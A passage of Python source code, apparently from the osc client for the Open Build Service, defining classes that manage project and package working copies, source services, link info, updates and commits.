<!-- See https://github.com/openSUSE/libzypp/tree/master/zypp/parser/yum/schema/patterns.rng -->
<!--
<pattern xmlns="http://novell.com/package/metadata/suse/pattern"
xmlns:rpm="http://linux.duke.edu/metadata/rpm">
<name></name>
<summary></summary>
<description></description>
<uservisible/>
<category lang="en"></category>
<rpm:requires>
<rpm:entry name="must-have-package"/>
</rpm:requires>
<rpm:recommends>
<rpm:entry name="package"/>
</rpm:recommends>
<rpm:suggests>
<rpm:entry name="anotherpackage"/>
</rpm:suggests>
</pattern>
-->
"""
buildstatus_symbols = {'succeeded': '.',
'disabled': ' ',
'expansion error': 'U', # obsolete with OBS 2.0
'unresolvable': 'U',
'failed': 'F',
'broken': 'B',
'blocked': 'b',
'building': '%',
'finished': 'f',
'scheduled': 's',
'locked': 'L',
'excluded': 'x',
'dispatching': 'd',
'signing': 'S',
}
# os.path.samefile is available only under Unix
def os_path_samefile(path1, path2):
try:
return os.path.samefile(path1, path2)
except:
return os.path.realpath(path1) == os.path.realpath(path2)
class File:
"""represent a file, including its metadata"""
def __init__(self, name, md5, size, mtime, skipped=False):
self.name = name
self.md5 = md5
self.size = size
self.mtime = mtime
self.skipped = skipped
def __repr__(self):
return self.name
def __str__(self):
return self.name
class Serviceinfo:
"""Source service content
"""
def __init__(self):
"""creates an empty serviceinfo instance"""
self.services = []
self.apiurl = None
self.project = None
self.package = None
def read(self, serviceinfo_node, append=False):
"""read in the source services <services> element passed as
elementtree node.
"""
def error(msg, xml):
data = 'invalid service format:\n%s' % ET.tostring(xml, encoding=ET_ENCODING)
raise ValueError("%s\n\n%s" % (data, msg))
if serviceinfo_node is None:
return
if not append:
self.services = []
services = serviceinfo_node.findall('service')
for service in services:
name = service.get('name')
if len(name) < 3 or '/' in name:
error("invalid service name: %s" % name, service)
mode = service.get('mode', '')
data = { 'name' : name, 'mode' : mode }
command = [ name ]
for param in service.findall('param'):
option = param.get('name')
if option is None:
error("%s: a parameter requires a name" % name, service)
value = ''
if param.text:
value = param.text
command.append('--' + option)
# hmm is this reasonable or do we want to allow real
# options (e.g., "--force" (without an argument)) as well?
command.append(value)
data['command'] = command
self.services.append(data)
def getProjectGlobalServices(self, apiurl, project, package):
self.apiurl = apiurl
# get all project wide services in one file, we don't store it yet
u = makeurl(apiurl, ['source', project, package], query='cmd=getprojectservices')
try:
f = http_POST(u)
root = ET.parse(f).getroot()
self.read(root, True)
self.project = project
self.package = package
except HTTPError as e:
if e.code == 404 and package != '_project':
self.getProjectGlobalServices(apiurl, project, '_project')
self.package = package
elif e.code != 403 and e.code != 400:
raise e
def addVerifyFile(self, serviceinfo_node, filename):
import hashlib
f = open(filename, 'r')
digest = hashlib.sha256(f.read()).hexdigest()
f.close()
r = serviceinfo_node
s = ET.Element( "service", name="verify_file" )
ET.SubElement(s, "param", name="file").text = filename
ET.SubElement(s, "param", name="verifier").text = "sha256"
ET.SubElement(s, "param", name="checksum").text = digest
r.append( s )
return r
def addDownloadUrl(self, serviceinfo_node, url_string):
url = urlparse( url_string )
protocol = url.scheme
host = url.netloc
path = url.path
r = serviceinfo_node
s = ET.Element( "service", name="download_url" )
ET.SubElement(s, "param", name="protocol").text = protocol
ET.SubElement(s, "param", name="host").text = host
ET.SubElement(s, "param", name="path").text = path
r.append( s )
return r
def addSetVersion(self, serviceinfo_node):
r = serviceinfo_node
s = ET.Element( "service", name="set_version", mode="buildtime" )
r.append( s )
return r
def addGitUrl(self, serviceinfo_node, url_string):
r = serviceinfo_node
s = ET.Element( "service", name="obs_scm" )
ET.SubElement(s, "param", name="url").text = url_string
ET.SubElement(s, "param", name="scm").text = "git"
r.append( s )
return r
def addTarUp(self, serviceinfo_node):
r = serviceinfo_node
s = ET.Element( "service", name="tar", mode="buildtime" )
r.append( s )
return r
def addRecompressTar(self, serviceinfo_node):
r = serviceinfo_node
s = ET.Element( "service", name="recompress", mode="buildtime" )
ET.SubElement(s, "param", name="file").text = "*.tar"
ET.SubElement(s, "param", name="compression").text = "xz"
r.append( s )
return r
def execute(self, dir, callmode = None, singleservice = None, verbose = None):
import tempfile
# cleanup existing generated files
for filename in os.listdir(dir):
if filename.startswith('_service:') or filename.startswith('_service_'):
ent = os.path.join(dir, filename)
if os.path.isdir(ent):
shutil.rmtree(ent)
else:
os.unlink(ent)
allservices = self.services or []
if singleservice and not singleservice in allservices:
# set array to the manual specified singleservice, if it is not part of _service file
data = { 'name' : singleservice, 'command' : [ singleservice ], 'mode' : '' }
allservices = [data]
# services can detect that they run via osc this way
os.putenv("OSC_VERSION", get_osc_version())
# set environment when using OBS 2.3 or later
if self.project != None:
# These need to be kept in sync with bs_service
os.putenv("OBS_SERVICE_APIURL", self.apiurl)
os.putenv("OBS_SERVICE_PROJECT", self.project)
os.putenv("OBS_SERVICE_PACKAGE", self.package)
# recreate files
ret = 0
for service in allservices:
if callmode != "all":
if singleservice and service['name'] != singleservice:
continue
if service['mode'] == "buildtime":
continue
if service['mode'] == "serveronly" and callmode != "disabled":
continue
if service['mode'] == "disabled" and callmode != "disabled":
continue
if service['mode'] != "disabled" and callmode == "disabled":
continue
if service['mode'] != "trylocal" and service['mode'] != "localonly" and callmode == "trylocal":
continue
temp_dir = None
try:
temp_dir = tempfile.mkdtemp(dir=dir, suffix='.%s.service' % service['name'])
cmd = service['command']
if not os.path.exists("/usr/lib/obs/service/"+cmd[0]):
raise oscerr.PackageNotInstalled("obs-service-%s"%cmd[0])
cmd[0] = "/usr/lib/obs/service/"+cmd[0]
cmd = cmd + [ "--outdir", temp_dir ]
if conf.config['verbose'] > 1 or verbose or conf.config['debug']:
print("Run source service:", ' '.join(cmd))
r = run_external(*cmd)
if r != 0:
print("Aborting: service call failed: ", ' '.join(cmd))
# FIXME: addDownloadUrlService calls si.execute after
# updating _services.
return r
if service['mode'] == "disabled" or service['mode'] == "trylocal" or service['mode'] == "localonly" or callmode == "local" or callmode == "trylocal" or callmode == "all":
for filename in os.listdir(temp_dir):
os.rename(os.path.join(temp_dir, filename), os.path.join(dir, filename))
else:
name = service['name']
for filename in os.listdir(temp_dir):
os.rename(os.path.join(temp_dir, filename), os.path.join(dir, "_service:"+name+":"+filename))
finally:
if temp_dir is not None:
shutil.rmtree(temp_dir)
return 0
class Linkinfo:
"""linkinfo metadata (which is part of the xml representing a directory
"""
def __init__(self):
"""creates an empty linkinfo instance"""
self.project = None
self.package = None
self.xsrcmd5 = None
self.lsrcmd5 = None
self.srcmd5 = None
self.error = None
self.rev = None
self.baserev = None
def read(self, linkinfo_node):
"""read in the linkinfo metadata from the <linkinfo> element passed as
elementtree node.
If the passed element is None, the method does nothing.
"""
if linkinfo_node == None:
return
self.project = linkinfo_node.get('project')
self.package = linkinfo_node.get('package')
self.xsrcmd5 = linkinfo_node.get('xsrcmd5')
self.lsrcmd5 = linkinfo_node.get('lsrcmd5')
self.srcmd5 = linkinfo_node.get('srcmd5')
self.error = linkinfo_node.get('error')
self.rev = linkinfo_node.get('rev')
self.baserev = linkinfo_node.get('baserev')
def islink(self):
"""returns True if the linkinfo is not empty, otherwise False"""
if self.xsrcmd5 or self.lsrcmd5:
return True
return False
def isexpanded(self):
"""returns True if the package is an expanded link"""
if self.lsrcmd5 and not self.xsrcmd5:
return True
return False
def haserror(self):
"""returns True if the link is in error state (could not be applied)"""
if self.error:
return True
return False
def __str__(self):
"""return an informatory string representation"""
if self.islink() and not self.isexpanded():
return 'project %s, package %s, xsrcmd5 %s, rev %s' \
% (self.project, self.package, self.xsrcmd5, self.rev)
elif self.islink() and self.isexpanded():
if self.haserror():
return 'broken link to project %s, package %s, srcmd5 %s, lsrcmd5 %s: %s' \
% (self.project, self.package, self.srcmd5, self.lsrcmd5, self.error)
else:
return 'expanded link to project %s, package %s, srcmd5 %s, lsrcmd5 %s' \
% (self.project, self.package, self.srcmd5, self.lsrcmd5)
else:
return 'None'
class DirectoryServiceinfo:
def __init__(self):
self.code = None
self.xsrcmd5 = None
self.lsrcmd5 = None
self.error = ''
def read(self, serviceinfo_node):
if serviceinfo_node is None:
return
self.code = serviceinfo_node.get('code')
self.xsrcmd5 = serviceinfo_node.get('xsrcmd5')
self.lsrcmd5 = serviceinfo_node.get('lsrcmd5')
self.error = serviceinfo_node.find('error')
if self.error:
self.error = self.error.text
def isexpanded(self):
"""
Returns true, if the directory contains the "expanded"/generated service files
"""
return self.lsrcmd5 is not None and self.xsrcmd5 is None
def haserror(self):
return self.error is not None
# http://effbot.org/zone/element-lib.htm#prettyprint
def xmlindent(elem, level=0):
i = "\n" + level*" "
if len(elem):
if not elem.text or not elem.text.strip():
elem.text = i + " "
for e in elem:
xmlindent(e, level+1)
if not e.tail or not e.tail.strip():
e.tail = i + " "
if not e.tail or not e.tail.strip():
e.tail = i
else:
if level and (not elem.tail or not elem.tail.strip()):
elem.tail = i
class Project:
"""
Represent a checked out project directory, holding packages.
:Attributes:
``dir``
The directory path containing the project.
``name``
The name of the project.
``apiurl``
The endpoint URL of the API server.
``pacs_available``
List of names of packages available server-side.
This is only populated if ``getPackageList`` is set
to ``True`` in the constructor.
``pacs_have``
List of names of packages which exist server-side
and exist in the local project working copy (if
'do_package_tracking' is disabled).
If 'do_package_tracking' is enabled it represents the
list names of packages which are tracked in the project
working copy (that is it might contain packages which
exist on the server as well as packages which do not
exist on the server (for instance if the local package
was added or if the package was removed on the server-side)).
``pacs_excluded``
List of names of packages in the local project directory
which are excluded by the `exclude_glob` configuration
variable. Only set if `do_package_tracking` is enabled.
``pacs_unvers``
List of names of packages in the local project directory
which are not tracked. Only set if `do_package_tracking`
is enabled.
``pacs_broken``
List of names of packages which are tracked but do not
exist in the local project working copy. Only set if
`do_package_tracking` is enabled.
``pacs_missing``
List of names of packages which exist server-side but
are not expected to exist in the local project directory.
"""
REQ_STOREFILES = ('_project', '_apiurl')
def __init__(self, dir, getPackageList=True, progress_obj=None, wc_check=True):
"""
Constructor.
:Parameters:
`dir` : str
The directory path containing the checked out project.
`getPackageList` : bool
Set to `False` if you want to skip retrieval from the
server of the list of packages in the project .
`wc_check` : bool
"""
import fnmatch
self.dir = dir
self.absdir = os.path.abspath(dir)
self.progress_obj = progress_obj
self.name = store_read_project(self.dir)
self.apiurl = store_read_apiurl(self.dir, defaulturl=not wc_check)
dirty_files = []
if wc_check:
dirty_files = self.wc_check()
if dirty_files:
msg = 'Your working copy \'%s\' is in an inconsistent state.\n' \
'Please run \'osc repairwc %s\' and check the state\n' \
'of the working copy afterwards (via \'osc status %s\')' % (self.dir, self.dir, self.dir)
raise oscerr.WorkingCopyInconsistent(self.name, None, dirty_files, msg)
if getPackageList:
self.pacs_available = meta_get_packagelist(self.apiurl, self.name)
else:
self.pacs_available = []
if conf.config['do_package_tracking']:
self.pac_root = self.read_packages().getroot()
self.pacs_have = [ pac.get('name') for pac in self.pac_root.findall('package') ]
self.pacs_excluded = [ i for i in os.listdir(self.dir)
for j in conf.config['exclude_glob']
if fnmatch.fnmatch(i, j) ]
self.pacs_unvers = [ i for i in os.listdir(self.dir) if i not in self.pacs_have and i not in self.pacs_excluded ]
# store all broken packages (e.g. packages which where removed by a non-osc cmd)
# in the self.pacs_broken list
self.pacs_broken = []
for p in self.pacs_have:
if not os.path.isdir(os.path.join(self.absdir, p)):
# all states will be replaced with the '!'-state
# (except it is already marked as deleted ('D'-state))
self.pacs_broken.append(p)
else:
self.pacs_have = [ i for i in os.listdir(self.dir) if i in self.pacs_available ]
self.pacs_missing = [ i for i in self.pacs_available if i not in self.pacs_have ]
def wc_check(self):
global store
dirty_files = []
req_storefiles = Project.REQ_STOREFILES
if conf.config['do_package_tracking']:
req_storefiles += ('_packages',)
for fname in req_storefiles:
if not os.path.exists(os.path.join(self.absdir, store, fname)):
dirty_files.append(fname)
return dirty_files
def wc_repair(self, apiurl=None):
global store
if not os.path.exists(os.path.join(self.dir, store, '_apiurl')) or apiurl:
if apiurl is None:
msg = 'cannot repair wc: the \'_apiurl\' file is missing but ' \
'no \'apiurl\' was passed to wc_repair'
# hmm should we raise oscerr.WrongArgs?
raise oscerr.WorkingCopyInconsistent(self.prjname, self.name, [], msg)
# sanity check
conf.parse_apisrv_url(None, apiurl)
store_write_apiurl(self.dir, apiurl)
self.apiurl = store_read_apiurl(self.dir, defaulturl=False)
def checkout_missing_pacs(self, sinfos, expand_link=False, unexpand_link=False):
for pac in self.pacs_missing:
if conf.config['do_package_tracking'] and pac in self.pacs_unvers:
# pac is not under version control but a local file/dir exists
msg = 'can\'t add package \'%s\': Object already exists' % pac
raise oscerr.PackageExists(self.name, pac, msg)
if not (expand_link or unexpand_link):
sinfo = sinfos.get(pac)
if sinfo is None:
# should never happen...
continue
linked = sinfo.find('linked')
if linked is not None and linked.get('project') == self.name:
# hmm what about a linkerror (sinfo.get('lsrcmd5') is None)?
# Should we skip the package as well or should we it out?
# let's skip it for now
print('Skipping %s (link to package %s)' % (pac, linked.get('package')))
continue
print('checking out new package %s' % pac)
checkout_package(self.apiurl, self.name, pac, \
pathname=getTransActPath(os.path.join(self.dir, pac)), \
prj_obj=self, prj_dir=self.dir,
expand_link=expand_link or not unexpand_link, progress_obj=self.progress_obj)
def status(self, pac):
exists = os.path.exists(os.path.join(self.absdir, pac))
st = self.get_state(pac)
if st is None and exists:
return '?'
elif st is None:
raise oscerr.OscIOError(None, 'osc: \'%s\' is not under version control' % pac)
elif st in ('A', ' ') and not exists:
return '!'
elif st == 'D' and not exists:
return 'D'
else:
return st
def get_status(self, *exclude_states):
res = []
for pac in self.pacs_have:
st = self.status(pac)
if not st in exclude_states:
res.append((st, pac))
if not '?' in exclude_states:
res.extend([('?', pac) for pac in self.pacs_unvers])
return res
def get_pacobj(self, pac, *pac_args, **pac_kwargs):
try:
st = self.status(pac)
if st in ('?', '!') or st == 'D' and not os.path.exists(os.path.join(self.dir, pac)):
return None
return Package(os.path.join(self.dir, pac), *pac_args, **pac_kwargs)
except oscerr.OscIOError:
return None
def set_state(self, pac, state):
node = self.get_package_node(pac)
if node == None:
self.new_package_entry(pac, state)
else:
node.set('state', state)
def get_package_node(self, pac):
for node in self.pac_root.findall('package'):
if pac == node.get('name'):
return node
return None
def del_package_node(self, pac):
for node in self.pac_root.findall('package'):
if pac == node.get('name'):
self.pac_root.remove(node)
def get_state(self, pac):
node = self.get_package_node(pac)
if node != None:
return node.get('state')
else:
return None
def new_package_entry(self, name, state):
ET.SubElement(self.pac_root, 'package', name=name, state=state)
def read_packages(self):
"""
Returns an ``xml.etree.cElementTree`` object representing the
parsed contents of the project's ``.osc/_packages`` XML file.
"""
global store
packages_file = os.path.join(self.absdir, store, '_packages')
if os.path.isfile(packages_file) and os.path.getsize(packages_file):
try:
result = ET.parse(packages_file)
except:
msg = 'Cannot read package file \'%s\'. ' % packages_file
msg += 'You can try to remove it and then run osc repairwc.'
raise oscerr.OscIOError(None, msg)
return result
else:
# scan project for existing packages and migrate them
cur_pacs = []
for data in os.listdir(self.dir):
pac_dir = os.path.join(self.absdir, data)
# we cannot use self.pacs_available because we cannot guarantee that the package list
# was fetched from the server
if data in meta_get_packagelist(self.apiurl, self.name) and is_package_dir(pac_dir) \
and Package(pac_dir).name == data:
cur_pacs.append(ET.Element('package', name=data, state=' '))
store_write_initial_packages(self.absdir, self.name, cur_pacs)
return ET.parse(os.path.join(self.absdir, store, '_packages'))
def write_packages(self):
xmlindent(self.pac_root)
store_write_string(self.absdir, '_packages', ET.tostring(self.pac_root, encoding=ET_ENCODING))
def addPackage(self, pac):
import fnmatch
for i in conf.config['exclude_glob']:
if fnmatch.fnmatch(pac, i):
msg = 'invalid package name: \'%s\' (see \'exclude_glob\' config option)' % pac
raise oscerr.OscIOError(None, msg)
state = self.get_state(pac)
if state == None or state == 'D':
self.new_package_entry(pac, 'A')
self.write_packages()
# sometimes the new pac doesn't exist in the list because
# it would take too much time to update all data structs regularly
if pac in self.pacs_unvers:
self.pacs_unvers.remove(pac)
else:
raise oscerr.PackageExists(self.name, pac, 'package \'%s\' is already under version control' % pac)
def delPackage(self, pac, force = False):
state = self.get_state(pac.name)
can_delete = True
if state == ' ' or state == 'D':
del_files = []
for filename in pac.filenamelist + pac.filenamelist_unvers:
filestate = pac.status(filename)
if filestate == 'M' or filestate == 'C' or \
filestate == 'A' or filestate == '?':
can_delete = False
else:
del_files.append(filename)
if can_delete or force:
for filename in del_files:
pac.delete_localfile(filename)
if pac.status(filename) != '?':
# this is not really necessary
pac.put_on_deletelist(filename)
print(statfrmt('D', getTransActPath(os.path.join(pac.dir, filename))))
print(statfrmt('D', getTransActPath(os.path.join(pac.dir, os.pardir, pac.name))))
pac.write_deletelist()
self.set_state(pac.name, 'D')
self.write_packages()
else:
print('package \'%s\' has local modifications (see osc st for details)' % pac.name)
elif state == 'A':
if force:
delete_dir(pac.absdir)
self.del_package_node(pac.name)
self.write_packages()
print(statfrmt('D', pac.name))
else:
print('package \'%s\' has local modifications (see osc st for details)' % pac.name)
elif state == None:
print('package is not under version control')
else:
print('unsupported state')
def update(self, pacs = (), expand_link=False, unexpand_link=False, service_files=False):
if len(pacs):
for pac in pacs:
Package(os.path.join(self.dir, pac), progress_obj=self.progress_obj).update()
else:
# we need to make sure that the _packages file will be written (even if an exception
# occurs)
try:
# update complete project
# packages which no longer exists upstream
upstream_del = [ pac for pac in self.pacs_have if not pac in self.pacs_available and self.get_state(pac) != 'A']
sinfo_pacs = [pac for pac in self.pacs_have if self.get_state(pac) in (' ', 'D') and not pac in self.pacs_broken]
sinfo_pacs.extend(self.pacs_missing)
sinfos = get_project_sourceinfo(self.apiurl, self.name, True, *sinfo_pacs)
for pac in upstream_del:
if self.status(pac) != '!':
p = Package(os.path.join(self.dir, pac))
self.delPackage(p, force = True)
delete_storedir(p.storedir)
try:
os.rmdir(pac)
except:
pass
self.pac_root.remove(self.get_package_node(pac))
self.pacs_have.remove(pac)
for pac in self.pacs_have:
state = self.get_state(pac)
if pac in self.pacs_broken:
if self.get_state(pac) != 'A':
checkout_package(self.apiurl, self.name, pac,
pathname=getTransActPath(os.path.join(self.dir, pac)), prj_obj=self,
prj_dir=self.dir, expand_link=not unexpand_link, progress_obj=self.progress_obj)
elif state == ' ':
# do a simple update
p = Package(os.path.join(self.dir, pac), progress_obj=self.progress_obj)
rev = None
needs_update = True
if expand_link and p.islink() and not p.isexpanded():
if p.haslinkerror():
try:
rev = show_upstream_xsrcmd5(p.apiurl, p.prjname, p.name, revision=p.rev)
except:
rev = show_upstream_xsrcmd5(p.apiurl, p.prjname, p.name, revision=p.rev, linkrev="base")
p.mark_frozen()
else:
rev = p.linkinfo.xsrcmd5
print('Expanding to rev', rev)
elif unexpand_link and p.islink() and p.isexpanded():
rev = p.linkinfo.lsrcmd5
print('Unexpanding to rev', rev)
elif p.islink() and p.isexpanded():
needs_update = p.update_needed(sinfos[p.name])
if needs_update:
rev = p.latest_rev()
elif p.hasserviceinfo() and p.serviceinfo.isexpanded() and not service_files:
# FIXME: currently, do_update does not propagate the --server-side-source-service-files
# option to this method. Consequence: an expanded service is always unexpanded during
# an update (TODO: discuss if this is a reasonable behavior (at least this the default
# behavior for a while))
needs_update = True
else:
needs_update = p.update_needed(sinfos[p.name])
print('Updating %s' % p.name)
if needs_update:
p.update(rev, service_files)
else:
print('At revision %s.' % p.rev)
if unexpand_link:
p.unmark_frozen()
elif state == 'D':
# pac exists (the non-existent pac case was handled in the first if block)
p = Package(os.path.join(self.dir, pac), progress_obj=self.progress_obj)
if p.update_needed(sinfos[p.name]):
p.update()
elif state == 'A' and pac in self.pacs_available:
# file/dir called pac already exists and is under version control
msg = 'can\'t add package \'%s\': Object already exists' % pac
raise oscerr.PackageExists(self.name, pac, msg)
elif state == 'A':
# do nothing
pass
else:
print('unexpected state.. package \'%s\'' % pac)
self.checkout_missing_pacs(sinfos, expand_link, unexpand_link)
finally:
self.write_packages()
def commit(self, pacs = (), msg = '', files = {}, verbose = False, skip_local_service_run = False, can_branch=False, force=False):
if len(pacs):
try:
for pac in pacs:
todo = []
if pac in files:
todo = files[pac]
state = self.get_state(pac)
if state == 'A':
self.commitNewPackage(pac, msg, todo, verbose=verbose, skip_local_service_run=skip_local_service_run)
elif state == 'D':
self.commitDelPackage(pac)
elif state == ' ':
# display the correct dir when sending the changes
if os_path_samefile(os.path.join(self.dir, pac), os.getcwd()):
p = Package('.')
else:
p = Package(os.path.join(self.dir, pac))
p.todo = todo
p.commit(msg, verbose=verbose, skip_local_service_run=skip_local_service_run, can_branch=can_branch, force=force)
elif pac in self.pacs_unvers and not is_package_dir(os.path.join(self.dir, pac)):
print('osc: \'%s\' is not under version control' % pac)
elif pac in self.pacs_broken:
print('osc: \'%s\' package not found' % pac)
elif state == None:
self.commitExtPackage(pac, msg, todo, verbose=verbose, skip_local_service_run=skip_local_service_run)
finally:
self.write_packages()
else:
# if we have packages marked as '!' we cannot commit
for pac in self.pacs_broken:
if self.get_state(pac) != 'D':
msg = 'commit failed: package \'%s\' is missing' % pac
raise oscerr.PackageMissing(self.name, pac, msg)
try:
for pac in self.pacs_have:
state = self.get_state(pac)
if state == ' ':
# do a simple commit
Package(os.path.join(self.dir, pac)).commit(msg, verbose=verbose, skip_local_service_run=skip_local_service_run)
elif state == 'D':
self.commitDelPackage(pac)
elif state == 'A':
self.commitNewPackage(pac, msg, verbose=verbose, skip_local_service_run=skip_local_service_run)
finally:
self.write_packages()
def commitNewPackage(self, pac, msg = '', files = [], verbose = False, skip_local_service_run = False):
"""creates and commits a new package if it does not exist on the server"""
if pac in self.pacs_available:
print('package \'%s\' already exists' % pac)
else:
user = conf.get_apiurl_usr(self.apiurl)
edit_meta(metatype='pkg',
path_args=(quote_plus(self.name), quote_plus(pac)),
template_args=({
'name': pac,
'user': user}),
apiurl=self.apiurl)
# display the correct dir when sending the changes
olddir = os.getcwd()
if os_path_samefile(os.path.join(self.dir, pac), os.curdir):
os.chdir(os.pardir)
p = Package(pac)
else:
p = Package(os.path.join(self.dir, pac))
p.todo = files
print(statfrmt('Sending', os.path.normpath(p.dir)))
p.commit(msg=msg, verbose=verbose, skip_local_service_run=skip_local_service_run)
self.set_state(pac, ' ')
os.chdir(olddir)
def commitDelPackage(self, pac):
"""deletes a package on the server and in the working copy"""
try:
# display the correct dir when sending the changes
if os_path_samefile(os.path.join(self.dir, pac), os.curdir):
pac_dir = pac
else:
pac_dir = os.path.join(self.dir, pac)
p = Package(os.path.join(self.dir, pac))
#print statfrmt('Deleting', os.path.normpath(os.path.join(p.dir, os.pardir, pac)))
delete_storedir(p.storedir)
try:
os.rmdir(p.dir)
except:
pass
except OSError:
pac_dir = os.path.join(self.dir, pac)
except (oscerr.NoWorkingCopy, oscerr.WorkingCopyOutdated, oscerr.PackageError):
pass
#print statfrmt('Deleting', getTransActPath(os.path.join(self.dir, pac)))
print(statfrmt('Deleting', getTransActPath(pac_dir)))
delete_package(self.apiurl, self.name, pac)
self.del_package_node(pac)
def commitExtPackage(self, pac, msg, files = [], verbose=False, skip_local_service_run=False):
"""commits a package from an external project"""
if os_path_samefile(os.path.join(self.dir, pac), os.getcwd()):
pac_path = '.'
else:
pac_path = os.path.join(self.dir, pac)
project = store_read_project(pac_path)
package = store_read_package(pac_path)
apiurl = store_read_apiurl(pac_path, defaulturl=False)
if not meta_exists(metatype='pkg',
path_args=(quote_plus(project), quote_plus(package)),
template_args=None, create_new=False, apiurl=apiurl):
user = conf.get_apiurl_usr(self.apiurl)
edit_meta(metatype='pkg',
path_args=(quote_plus(project), quote_plus(package)),
template_args=({'name': pac, 'user': user}), apiurl=apiurl)
p = Package(pac_path)
p.todo = files
p.commit(msg=msg, verbose=verbose, skip_local_service_run=skip_local_service_run)
def __str__(self):
r = []
r.append('*****************************************************')
r.append('Project %s (dir=%s, absdir=%s)' % (self.name, self.dir, self.absdir))
r.append('have pacs:\n%s' % ', '.join(self.pacs_have))
r.append('missing pacs:\n%s' % ', '.join(self.pacs_missing))
r.append('*****************************************************')
return '\n'.join(r)
@staticmethod
def init_project(apiurl, dir, project, package_tracking=True, getPackageList=True, progress_obj=None, wc_check=True):
global store
if not os.path.exists(dir):
# use makedirs (checkout_no_colon config option might be enabled)
os.makedirs(dir)
elif not os.path.isdir(dir):
raise oscerr.OscIOError(None, 'error: \'%s\' is no directory' % dir)
if os.path.exists(os.path.join(dir, store)):
raise oscerr.OscIOError(None, 'error: \'%s\' is already an initialized osc working copy' % dir)
else:
os.mkdir(os.path.join(dir, store))
store_write_project(dir, project)
store_write_apiurl(dir, apiurl)
if package_tracking:
store_write_initial_packages(dir, project, [])
return Project(dir, getPackageList, progress_obj, wc_check)
class Package:
"""represent a package (its directory) and read/keep/write its metadata"""
# should _meta be a required file?
REQ_STOREFILES = ('_project', '_package', '_apiurl', '_files', '_osclib_version')
OPT_STOREFILES = ('_to_be_added', '_to_be_deleted', '_in_conflict', '_in_update',
'_in_commit', '_meta', '_meta_mode', '_frozenlink', '_pulled', '_linkrepair',
'_size_limit', '_commit_msg')
def __init__(self, workingdir, progress_obj=None, size_limit=None, wc_check=True):
global store
self.dir = workingdir
self.absdir = os.path.abspath(self.dir)
self.storedir = os.path.join(self.absdir, store)
self.progress_obj = progress_obj
self.size_limit = size_limit
if size_limit and size_limit == 0:
self.size_limit = None
check_store_version(self.dir)
self.prjname = store_read_project(self.dir)
self.name = store_read_package(self.dir)
self.apiurl = store_read_apiurl(self.dir, defaulturl=not wc_check)
self.update_datastructs()
dirty_files = []
if wc_check:
dirty_files = self.wc_check()
if dirty_files:
msg = 'Your working copy \'%s\' is in an inconsistent state.\n' \
'Please run \'osc repairwc %s\' (Note this might _remove_\n' \
'files from the .osc/ dir). Please check the state\n' \
'of the working copy afterwards (via \'osc status %s\')' % (self.dir, self.dir, self.dir)
raise oscerr.WorkingCopyInconsistent(self.prjname, self.name, dirty_files, msg)
self.todo = []
def wc_check(self):
dirty_files = []
for fname in self.filenamelist:
if not os.path.exists(os.path.join(self.storedir, fname)) and not fname in self.skipped:
dirty_files.append(fname)
for fname in Package.REQ_STOREFILES:
if not os.path.isfile(os.path.join(self.storedir, fname)):
dirty_files.append(fname)
for fname in os.listdir(self.storedir):
if fname in Package.REQ_STOREFILES or fname in Package.OPT_STOREFILES or \
fname.startswith('_build'):
continue
elif fname in self.filenamelist and fname in self.skipped:
dirty_files.append(fname)
elif not fname in self.filenamelist:
dirty_files.append(fname)
for fname in self.to_be_deleted[:]:
if not fname in self.filenamelist:
dirty_files.append(fname)
for fname in self.in_conflict[:]:
if not fname in self.filenamelist:
dirty_files.append(fname)
return dirty_files
def wc_repair(self, apiurl=None):
if not os.path.exists(os.path.join(self.storedir, '_apiurl')) or apiurl:
if apiurl is None:
msg = 'cannot repair wc: the \'_apiurl\' file is missing but ' \
'no \'apiurl\' was passed to wc_repair'
# hmm should we raise oscerr.WrongArgs?
raise oscerr.WorkingCopyInconsistent(self.prjname, self.name, [], msg)
# sanity check
conf.parse_apisrv_url(None, apiurl)
store_write_apiurl(self.dir, apiurl)
self.apiurl = store_read_apiurl(self.dir, defaulturl=False)
# all files which are present in the filelist have to exist in the storedir
for f in self.filelist:
# XXX: should we also check the md5?
if not os.path.exists(os.path.join(self.storedir, f.name)) and not f.name in self.skipped:
# if get_source_file fails we're screwed up...
get_source_file(self.apiurl, self.prjname, self.name, f.name,
targetfilename=os.path.join(self.storedir, f.name), revision=self.rev,
mtime=f.mtime)
for fname in os.listdir(self.storedir):
if fname in Package.REQ_STOREFILES or fname in Package.OPT_STOREFILES or \
fname.startswith('_build'):
continue
elif not fname in self.filenamelist or fname in self.skipped:
# this file does not belong to the storedir so remove it
os.unlink(os.path.join(self.storedir, fname))
for fname in self.to_be_deleted[:]:
if not fname in self.filenamelist:
self.to_be_deleted.remove(fname)
self.write_deletelist()
for fname in self.in_conflict[:]:
if not fname in self.filenamelist:
self.in_conflict.remove(fname)
self.write_conflictlist()
def info(self):
source_url = makeurl(self.apiurl, ['source', self.prjname, self.name])
r = info_templ % (self.prjname, self.name, self.absdir, self.apiurl, source_url, self.srcmd5, self.rev, self.linkinfo)
return r
def addfile(self, n):
if not os.path.exists(os.path.join(self.absdir, n)):
raise oscerr.OscIOError(None, 'error: file \'%s\' does not exist' % n)
if n in self.to_be_deleted:
self.to_be_deleted.remove(n)
# self.delete_storefile(n)
self.write_deletelist()
elif n in self.filenamelist or n in self.to_be_added:
raise oscerr.PackageFileConflict(self.prjname, self.name, n, 'osc: warning: \'%s\' is already under version control' % n)
# shutil.copyfile(os.path.join(self.dir, n), os.path.join(self.storedir, n))
if self.dir != '.':
pathname = os.path.join(self.dir, n)
else:
pathname = n
self.to_be_added.append(n)
self.write_addlist()
print(statfrmt('A', pathname))
def delete_file(self, n, force=False):
"""deletes a file if possible and marks the file as deleted"""
state = '?'
try:
state = self.status(n)
except IOError as ioe:
if not force:
raise ioe
if state in ['?', 'A', 'M', 'R', 'C'] and not force:
return (False, state)
# special handling for skipped files: if file exists, simply delete it
if state == 'S':
exists = os.path.exists(os.path.join(self.dir, n))
self.delete_localfile(n)
return (exists, 'S')
self.delete_localfile(n)
was_added = n in self.to_be_added
if state in ('A', 'R') or state == '!' and was_added:
self.to_be_added.remove(n)
self.write_addlist()
elif state == 'C':
# don't remove "merge files" (*.r, *.mine...)
# that's why we don't use clear_from_conflictlist
self.in_conflict.remove(n)
self.write_conflictlist()
if not state in ('A', '?') and not (state == '!' and was_added):
self.put_on_deletelist(n)
self.write_deletelist()
return (True, state)
def delete_storefile(self, n):
try: os.unlink(os.path.join(self.storedir, n))
except: pass
def delete_localfile(self, n):
try: os.unlink(os.path.join(self.dir, n))
except: pass
def put_on_deletelist(self, n):
if n not in self.to_be_deleted:
self.to_be_deleted.append(n)
def put_on_conflictlist(self, n):
if n not in self.in_conflict:
